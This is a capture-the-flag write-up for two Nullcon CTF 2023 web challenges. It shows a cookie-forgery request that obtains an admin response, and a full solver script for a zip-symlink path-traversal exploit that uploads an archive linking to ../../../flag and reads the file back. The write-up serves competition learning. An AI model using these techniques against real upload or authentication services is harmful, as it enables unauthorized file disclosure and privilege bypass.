Nullcon CTF 2023

https://ctftime.org/event/1900

Challs#

reguest#

We can send an HTTP GET request using the cURL utility to the address http://52.59.124.14:10014, including a cookie in the request header.

import requests

url = 'http://52.59.124.14:10014'
cookies = {'role': 'admin', 'really': 'yes'}
resp = requests.get(url, cookies=cookies)

print(resp.content.decode())

The -b argument is used to specify the cookie that will be included in the request header. The value of the cookie is role=admin; really=yes. This cookie can be used by the server for authentication or other settings.

In this case, the request is targeted to a web service that requires authorization at the ‘admin’ level and requests confirmation from the user (‘really=yes’).

Or use this simple payloads

$ curl -b "role=admin; really=yes" http://52.59.124.14:10014

Usage: Look at the code ;-)

Overwriting cookies with default value! This must be secure!
Prepared request cookies are: [('really', 'yes'), ('role', 'guest')]
Sending request...
Request cookies are: [('really', 'yes'), ('role', 'guest')]

Someone's drunk oO

Response is: Admin: ENO{R3Qu3sts_4r3_s0m3T1m3s_we1rd_dont_get_confused}

zpr#

Create a txt file coba.txt that has text ../../../flag indicate as the path. The soft link will refer to the original file, so changes made to the original file will also be visible in the symlink.

$ ln -sfn ../../../flag coba.txt

The coba.txt file will be blank and it turn into a symlink

Then zip into file named test.zip that contains the file coba.txt. The –symlink argument in this command indicates that the soft link coba.txt will be included in the zip file. Send the test.zip file to the server using the POST method with the help of the curl library.

$ zip test.zip coba.txt --symlink

Make an HTTP GET request to the server https://52.59.124.14:10016 to access the file coba.txt located in the directory. In the HTTP request header, the -v argument in the curl command indicates that the displayed output will include verbose information about the HTTP request process. Therefore, in addition to the contents of the coba.txt file, the output of the curl command will display information such as status code, header, and server response time.

Final script solver

 1import os
 2import requests
 3
 4os.system('ln -sfn ../../../flag coba.txt')
 5os.system('zip test.zip coba.txt --symlink')
 6
 7files = {'file': ('test.zip', open('test.zip', 'rb'), 'application/zip')}
 8response = requests.post('http://52.59.124.14:10015/', files=files)
 9
10print(response.text)
11
12if "coba.txt" in response.text:
13    filepath = response.text.strip()
14    filepath_parts = filepath.split("/")
15    directory = filepath_parts[-2]
16    url = f"http://52.59.124.14:10016/{directory}/coba.txt"
17    os.system(f"curl -v {url}")

Running

$ python3 solver.py
updating: coba.txt (stored 0%)
Found a file: /tmp/data/eef19175f624ce410f0eb8aff0e87525/bd361131b238f364b10edcc61a356ff9.zip
Found a file: /tmp/data/eef19175f624ce410f0eb8aff0e87525/coba.txt
Find your files at http://...:8088/eef19175f624ce410f0eb8aff0e87525/

*   Trying 52.59.124.14:10016...
* Connected to 52.59.124.14 (52.59.124.14) port 10016 (#0)
> GET /eef19175f624ce410f0eb8aff0e87525/coba.txt HTTP/1.1
> Host: 52.59.124.14:10016
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: SimpleHTTP/0.6 Python/3.11.2
< Date: Fri, 10 Mar 2023 12:57:01 GMT
< Content-type: text/plain
< Content-Length: 46
< Last-Modified: Thu, 09 Mar 2023 09:00:53 GMT
<
ENO{Z1pF1L3s_C4N_B3_Dangerous_so_b3_c4r3ful!}
* Closing connection 0